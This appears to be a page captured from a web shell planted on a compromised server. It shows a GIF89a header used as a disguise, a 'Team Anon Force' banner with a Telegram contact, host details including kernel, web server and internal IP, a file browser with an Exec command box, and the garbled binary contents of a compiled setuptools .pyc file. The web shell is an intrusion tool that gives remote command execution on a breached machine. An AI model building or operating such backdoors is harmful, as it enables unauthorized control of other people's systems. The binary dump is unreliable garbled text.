GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
__pycache__
[ HOME ]
Exec
Submit
discovery.cpython-38.pyc
U �}�h�R � @ s� d Z ddlmZ ddlZddlZddlmZ ddlmZ ddlm Z ddl mZmZm Z mZ ddlZdd lmZ dd lmZ ddlmZ e e ZejjZer�ddlmZ d dd�dd�ZG dd� d�ZG dd� d�Z G dd� de �Z!G dd� de!�Z"G dd� de �Z#G dd� de"�Z$G dd� de#�Z%d d d!d"�d#d$�Z&G d%d&� d&�Z'd!d!d'�d(d)�Z(d!d!d'�d*d+�Z)d!d,d d-d.�d/d0�Z*d d,d d d1�d2d3�Z+d!d d4d5�d6d7�Z,dS )8u_ Automatic discovery of Python modules and packages (for inclusion in the distribution) and other config values. For the purposes of this module, the following nomenclature is used: - "src-layout": a directory representing a Python project that contains a "src" folder. Everything under the "src" folder is meant to be included in the distribution when packaging the project. Example:: . ├── tox.ini ├── pyproject.toml └── src/ └── mypkg/ ├── __init__.py ├── mymodule.py └── my_data_file.txt - "flat-layout": a Python project that does not use "src-layout" but instead have a directory under the project root for each package:: . ├── tox.ini ├── pyproject.toml └── mypkg/ ├── __init__.py ├── mymodule.py └── my_data_file.txt - "single-module": a project that contains a single Python script direct under the project root (no directory used):: . ├── tox.ini ├── pyproject.toml └── mymodule.py � )�annotationsN��fnmatchcase)�glob)�Path)� TYPE_CHECKING�Iterable�Iterator�Mapping� )�StrPath)�log)�convert_path)�Distributionr �bool)�path�returnc C s t j�| ��� S �N)�osr �basename�isidentifier)r � r �;/tmp/pip-target-k_nuic9h/lib/python/setuptools/discovery.py�_valid_nameD s r c @ s>